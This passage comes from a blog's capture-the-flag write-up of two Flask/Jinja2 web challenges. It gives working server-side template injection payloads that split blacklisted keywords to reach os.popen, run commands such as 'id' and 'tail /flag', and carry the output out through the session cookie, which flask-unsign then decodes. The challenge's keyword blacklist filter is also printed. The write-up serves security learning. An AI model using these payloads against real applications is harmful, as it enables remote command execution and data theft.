<p>So, the idea here is pretty simple and basically we need to us an empty space between the blacklisted strings.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#E1E4E8">cycler[</span><span style="color:#9ECBFF">'__in'</span><span style="color:#9ECBFF"> 'it__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'__glo'</span><span style="color:#9ECBFF"> 'bals__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'os'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'popen'</span><span style="color:#E1E4E8">](</span><span style="color:#9ECBFF">'id'</span><span style="color:#E1E4E8">)[</span><span style="color:#9ECBFF">'rea'</span><span style="color:#9ECBFF"> 'd'</span><span style="color:#E1E4E8">]()</span></span></code></pre>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#F97583">>>></span><span style="color:#E1E4E8"> Template(</span><span style="color:#9ECBFF">"My name is </span><span style="color:#79B8FF">{{</span><span style="color:#9ECBFF">cycler[r['__in' 'it__']['__glo' 'bals__'].os.popen('id').read()</span><span style="color:#79B8FF">}}</span><span style="color:#9ECBFF">"</span><span style="color:#E1E4E8">).render()</span></span>
<span class="line"><span style="color:#9ECBFF">'My name is uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floopy),27(sudo),29(audio),30(dip),142(kaboxer)</span><span style="color:#79B8FF">\n</span><span style="color:#9ECBFF">'</span></span></code></pre>
<p>At this point, we’re pretty much over.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#E1E4E8">{</span><span style="color:#F97583">%if</span><span style="color:#E1E4E8"> session.update({</span><span style="color:#9ECBFF">'f'</span><span style="color:#E1E4E8">:cycler[</span><span style="color:#9ECBFF">'__in'</span><span style="color:#9ECBFF"> 'it__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'__glo'</span><span style="color:#9ECBFF"> 'bals__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'os'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'popen'</span><span style="color:#E1E4E8">](</span><span style="color:#9ECBFF">'tail /flag'</span><span style="color:#E1E4E8">)[</span><span style="color:#9ECBFF">'re'</span><span style="color:#9ECBFF"> 'ad'</span><span style="color:#E1E4E8">]()}{</span><span style="color:#F97583">%</span><span style="color:#E1E4E8">endif</span><span style="color:#F97583">%</span><span style="color:#E1E4E8">}</span></span></code></pre>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="shell"><code><span class="line"><span style="color:#B392F0">$</span><span style="color:#9ECBFF"> python3</span><span style="color:#9ECBFF"> check_filterz.py</span></span>
<span class="line"><span style="color:#B392F0">input:</span><span style="color:#9ECBFF"> {%if</span><span style="color:#9ECBFF"> session.update</span><span style="color:#E1E4E8">({'f':cycler['__in' 'it__']['__glo' 'bals__']['os']['popen']('tail /flag')['re' 'ad']()}{%endif%}</span></span>
<span class="line"><span style="color:#E1E4E8">[.] </span><span style="color:#B392F0">1</span></span>
<span class="line"><span style="color:#E1E4E8">[:] 1</span></span>
<span class="line"><span style="color:#E1E4E8">[/] 1</span></span>
<span class="line"><span style="color:#E1E4E8">[%] 3</span></span>
<span class="line"><span style="color:#E1E4E8">[len] 116</span></span></code></pre>
<p>The only problem here, is that we’re exceeding the length limit. This is where I got stuck, I kept searching and fuzzing for smaller payloads and ended up using <code>lipsum</code>.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#E1E4E8">lipsum.</span><span style="color:#79B8FF">__globals__</span><span style="color:#E1E4E8">.__os__.__popen__(</span><span style="color:#9ECBFF">'id'</span><span style="color:#E1E4E8">).read()</span></span></code></pre>
<p>I then transformed it:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#E1E4E8">lipsum[</span><span style="color:#9ECBFF">'__glo'</span><span style="color:#9ECBFF"> 'bals__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'os'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'popen'</span><span style="color:#E1E4E8">](</span><span style="color:#9ECBFF">'tail /flag'</span><span style="color:#E1E4E8">)[</span><span style="color:#9ECBFF">'re'</span><span style="color:#9ECBFF"> 'ad'</span><span style="color:#E1E4E8">]()</span></span></code></pre>
<p>Our final payload is:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#E1E4E8">{</span><span style="color:#F97583">%if</span><span style="color:#E1E4E8"> session.update({</span><span style="color:#9ECBFF">'f'</span><span style="color:#E1E4E8">:lipsum[</span><span style="color:#9ECBFF">'__glo'</span><span style="color:#9ECBFF"> 'bals__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'os'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'popen'</span><span style="color:#E1E4E8">](</span><span style="color:#9ECBFF">'tail /flag'</span><span style="color:#E1E4E8">)[</span><span style="color:#9ECBFF">'re'</span><span style="color:#9ECBFF"> 'ad'</span><span style="color:#E1E4E8">]()})</span><span style="color:#F97583">%</span><span style="color:#E1E4E8">}{</span><span style="color:#F97583">%</span><span style="color:#E1E4E8">endif</span><span style="color:#F97583">%</span><span style="color:#E1E4E8">}</span></span></code></pre>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="shell"><code><span class="line"><span style="color:#B392F0">$</span><span style="color:#9ECBFF"> python3</span><span style="color:#9ECBFF"> check_filterz.py</span></span>
<span class="line"><span style="color:#B392F0">input:</span><span style="color:#9ECBFF"> {%if</span><span style="color:#9ECBFF"> session.update</span><span style="color:#E1E4E8">({'f':lipsum['__glo' 'bals__']['os']['popen']('tail /flag')['re' 'ad']()})%}{%endif%}</span></span>
<span class="line"><span style="color:#B392F0">True</span></span></code></pre>
<p>Finally, we submit it and get the cookie and decode it and get the flag \o/</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="shell"><code><span class="line"><span style="color:#B392F0">$</span><span style="color:#9ECBFF"> flask-unsign</span><span style="color:#79B8FF"> -d</span><span style="color:#79B8FF"> -c</span><span style="color:#9ECBFF"> "eyJmIjoiY3Jld3s2ZjAyMWQwNWRiNTE1YTEyNGM5OTg1zmN1NTVlMGI2Yn0iLCJ1c2VyIjoiYWRtaW4ifQ.YlveoA.-EYuiEy5AxCtCGn68xioShVhVsg"</span></span>
<span class="line"><span style="color:#E1E4E8">{</span><span style="color:#B392F0">'f'</span><span style="color:#79B8FF">:</span><span style="color:#9ECBFF"> 'crew{6f021d05db515a124c9985fce55c0b6b}',</span><span style="color:#9ECBFF"> 'user':</span><span style="color:#9ECBFF"> 'admin'}</span></span></code></pre>
<h1 id="ezchall-again-web">EzChall Again (Web)</h1>
<p>So this is pretty much the same challenge but with more filters, we’ll use almost the same techniques before just changing some stuff</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> string</span></span>
<span class="line"></span>
<span class="line"><span style="color:#79B8FF">UNALLOWED</span><span style="color:#F97583"> =</span><span style="color:#E1E4E8"> [</span></span>
<span class="line"><span style="color:#9ECBFF"> 'class'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'mro'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'init'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'builtins'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'request'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'app'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'sleep'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'add'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'+'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'config'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'subclasses'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'format'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'dict'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'get'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'attr'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'globals'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'time'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'read'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'import'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'sys'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'cookies'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'headers'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'doc'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'url'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'encode'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'decode'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'chr'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'ord'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'replace'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'echo'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'base'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'self'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'template'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'print'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'exec'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'response'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'join'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'cat'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'if'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'end'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'for'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'sum'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'</span><span style="color:#79B8FF">%s</span><span style="color:#9ECBFF">'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'</span><span style="color:#79B8FF">{}</span><span style="color:#9ECBFF">'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'</span><span style="color:#79B8FF">\\</span><span style="color:#9ECBFF">'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'*'</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'&#x26;'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">"</span><span style="color:#79B8FF">{{</span><span style="color:#9ECBFF">"</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">"</span><span style="color:#79B8FF">}}</span><span style="color:#9ECBFF">"</span><span style="color:#E1E4E8">, </span><span style="color:#9ECBFF">'[]'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">"''"</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'""'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'|'</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'=='</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">'~'</span><span style="color:#E1E4E8">]</span></span>
<span class="line"></span>
<span class="line"></span>
<span class="line"><span style="color:#F97583">def</span><span style="color:#B392F0"> check_filter</span><span style="color:#E1E4E8">(input):</span></span>
<span class="line"><span style="color:#79B8FF">    input</span><span style="color:#F97583"> =</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">.lower()</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">.count(</span><span style="color:#9ECBFF">'.'</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">></span><span style="color:#79B8FF"> 1</span><span style="color:#F97583"> or</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">.count(</span><span style="color:#9ECBFF">':'</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">></span><span style="color:#79B8FF"> 1</span><span style="color:#F97583"> or</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">.count(</span><span style="color:#9ECBFF">'/'</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">></span><span style="color:#79B8FF"> 1</span><span style="color:#F97583"> or</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">.count(</span><span style="color:#9ECBFF">'%'</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">></span><span style="color:#79B8FF"> 2</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">        return</span><span style="color:#79B8FF"> False</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#79B8FF"> len</span><span style="color:#E1E4E8">(</span><span style="color:#79B8FF">input</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">&#x3C;</span><span style="color:#79B8FF"> 115</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">        for</span><span style="color:#E1E4E8"> char </span><span style="color:#F97583">in</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">            if</span><span style="color:#E1E4E8"> char </span><span style="color:#F97583">in</span><span style="color:#E1E4E8"> string.digits:</span></span>
<span class="line"><span style="color:#F97583">                return</span><span style="color:#79B8FF"> False</span></span>
<span class="line"><span style="color:#F97583">        for</span><span style="color:#E1E4E8"> i </span><span style="color:#F97583">in</span><span style="color:#79B8FF"> UNALLOWED</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">            if</span><span style="color:#E1E4E8"> i </span><span style="color:#F97583">in</span><span style="color:#79B8FF"> input</span><span style="color:#E1E4E8">:</span></span>
<span class="line"><span style="color:#F97583">                return</span><span style="color:#79B8FF"> False</span></span>
<span class="line"><span style="color:#F97583">        return</span><span style="color:#79B8FF"> True</span></span>
<span class="line"><span style="color:#F97583">    return</span><span style="color:#79B8FF"> False</span></span></code></pre>
<p>So basically, we can’t use <code>if</code> / <code>for</code> / <code>lipsum</code>.</p>
<p>Upon reading Jinja2 docs, I’ve found that we can use <code>Assignments</code> using the function <code>set</code>.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#E1E4E8">{</span><span style="color:#F97583">%</span><span style="color:#79B8FF"> set</span><span style="color:#E1E4E8"> a=payload </span><span style="color:#F97583">%</span><span style="color:#E1E4E8">}</span></span></code></pre>
<p>As <code>lipsum</code> is filtered because of <code>sum</code>, we’ll use the payload that we created in the first challenge with <code>cycler</code>.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#E1E4E8">cycler[</span><span style="color:#9ECBFF">'__in'</span><span style="color:#9ECBFF"> 'it__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'__glo'</span><span style="color:#9ECBFF"> 'bals__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'os'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'popen'</span><span style="color:#E1E4E8">](</span><span style="color:#9ECBFF">'id'</span><span style="color:#E1E4E8">)[</span><span style="color:#9ECBFF">'rea'</span><span style="color:#9ECBFF"> 'd'</span><span style="color:#E1E4E8">]()</span></span></code></pre>
<p>Our payload to exfiltrate the flag will be:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#E1E4E8">session.update({</span><span style="color:#9ECBFF">'f'</span><span style="color:#E1E4E8">:cycler[</span><span style="color:#9ECBFF">'__ini'</span><span style="color:#9ECBFF"> 't__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'__glo'</span><span style="color:#9ECBFF"> 'bals__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'os'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'popen'</span><span style="color:#E1E4E8">](</span><span style="color:#9ECBFF">'tac /flag'</span><span style="color:#E1E4E8">)[</span><span style="color:#9ECBFF">'re'</span><span style="color:#9ECBFF"> 'ad'</span><span style="color:#E1E4E8">]()})</span></span></code></pre>
<p>Our final payload is:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="py"><code><span class="line"><span style="color:#E1E4E8">{</span><span style="color:#F97583">%</span><span style="color:#79B8FF"> set</span><span style="color:#E1E4E8"> a=session.update({</span><span style="color:#9ECBFF">'f'</span><span style="color:#E1E4E8">:cycler[</span><span style="color:#9ECBFF">'__ini'</span><span style="color:#9ECBFF"> 't__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'__glo'</span><span style="color:#9ECBFF"> 'bals__'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'os'</span><span style="color:#E1E4E8">][</span><span style="color:#9ECBFF">'popen'</span><span style="color:#E1E4E8">](</span><span style="color:#9ECBFF">'tac /flag'</span><span style="color:#E1E4E8">)[</span><span style="color:#9ECBFF">'re'</span><span style="color:#9ECBFF"> 'ad'</span><span style="color:#E1E4E8">]()}) </span><span style="color:#F97583">%</span><span style="color:#E1E4E8">}</span></span></code></pre>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>[len] 114</span></span>
<span class="line"><span>True</span></span></code></pre>
<p>Now, we can use it and get the cookie containing the flag.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="shell"><code><span class="line"><span style="color:#B392F0">$</span><span style="color:#9ECBFF"> flask-unsign</span><span style="color:#79B8FF"> -d</span><span style="color:#79B8FF"> -c</span><span style="color:#9ECBFF"> "eyJmIjoiY3Jld3s2NmM5MGMwNzkzYzQ1MmY2YjY4MA5ZWYxYzI4YM3OX0iLCJ1c2VyIjoiYWRtaW4ifQ.Y1v7AQ.5NZKstHzeVcckdiYqsLuOWfvLfw"</span></span>
<span class="line"><span style="color:#E1E4E8">{</span><span style="color:#B392F0">'f'</span><span style="color:#79B8FF">:</span><span style="color:#9ECBFF"> 'crew{66c90c0793c452f6b68209ef1c28ac79}',</span><span style="color:#9ECBFF"> 'user':</span><span style="color:#9ECBFF"> 'admin'}</span></span></code></pre>
<p>This is all for this post, I hope you liked these two writeups!</p>  </div> <nav class="pager" aria-label="Post navigation"> <a href="/posts/htb-breadcrumbs/"><span class="lbl">← prev</span>HackTheBox - Breadcrumbs Writeup</a> <a class="next" href="/posts/Fullpwn-STF/"><span class="lbl">next →</span>STACK The Flags 2022 Open – Fullpwn</a> </nav> </article> </div> <button class="to-top" id="to-top" type="button" aria-label="Back to top">↑ top</button>  </main> <footer class="site-footer" data-pagefind-ignore> <div class="inner"> <span>© 2026 ElleuchX1</span> <span> <a href="https://github.com/ElleuchX1">github</a> ·
<a href="https://twitter.com/ElleuchX1">x</a> ·
<a href="/rss.xml">rss</a> ·
<a href="mailto:contact@elleu.ch">mail</a> </span> </div> </footer> </body></html> <script>
  (function () {
    // reading progress + back-to-top
    var bar = document.getElementById('progress');
    var top = document.getElementById('to-top');
    function update() {
      var h = document.documentElement;
      var max = h.scrollHeight - h.clientHeight;
      var pct = max > 0 ? h.scrollTop / max : 0;
      if (bar) bar.style.width = pct * 100 + '%';
      if (top) top.classList.toggle('show', h.scrollTop > 600);
    }
    document.addEventListener('scroll', update, { passive: true });
    if (top) top.addEventListener('click', function () { window.scrollTo({ top: 0, behavior: 'smooth' }); });
    update();

    // permalink anchors on headings
    document.querySelectorAll('.prose h2[id], .prose h3[id]').forEach(function (h) {
      var a = document.createElement('a');
      a.className = 'anchor';
      a.href = '#' + h.id;
      a.setAttribute('aria-label', 'Link to this section');
      a.textContent = '#';
      h.appendChild(a);
    });

    // code blocks: language label + copy button
    document.querySelectorAll('.prose pre.astro-code').forEach(function (pre) {
      var wrap = document.createElement('div');
      wrap.className = 'code';
      pre.parentNode.insertBefore(wrap, pre);
      var bar = document.createElement('div');
      bar.className = 'code-bar';
      var lang = pre.getAttribute('data-language') || 'text';
      var span = document.createElement('span');
      span.className = 'code-lang';
      span.textContent = lang;
      var btn = document.createElement('button');
      btn.type = 'button';
      btn.className = 'copy';
      btn.textContent = 'copy';
      btn.addEventListener('click', function () {
        var text = pre.innerText;
        var done = function () { btn.textContent = 'copied'; setTimeout(function () { btn.textContent = 'copy'; }, 1200); };
        if (navigator.clipboard) { navigator.clipboard.writeText(text).then(done, done); }
        else {
          var ta = document.createElement('textarea'); ta.value = text; document.body.appendChild(ta); ta.select();
          try { document.execCommand('copy'); } catch (e) {} ta.remove(); done();
        }
      });
      bar.appendChild(span);
      bar.appendChild(btn);
      wrap.appendChild(bar);
      wrap.appendChild(pre);
    });
  })();
</script>